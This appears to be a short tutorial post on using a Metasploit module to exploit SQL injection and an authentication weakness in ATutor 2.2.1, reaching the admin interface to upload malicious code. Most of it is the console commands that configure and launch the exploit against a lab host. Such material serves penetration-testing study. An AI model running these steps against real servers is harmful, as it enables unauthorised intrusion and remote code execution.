This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.
Exploit Targets
ATutor 2.2.1
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use exploit/multi/http/atutor_sqli
msf exploit (atutor_sqli)>set targeturi /Atutor/
msf exploit (atutor_sqli)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (atutor_sqli)>set rport 80
msf exploit (atutor_sqli)>exploit
The post Hack Web Server using ATutor 2.2.1 SQL Injection / Remote Code Execution appeared first on Hacking Articles.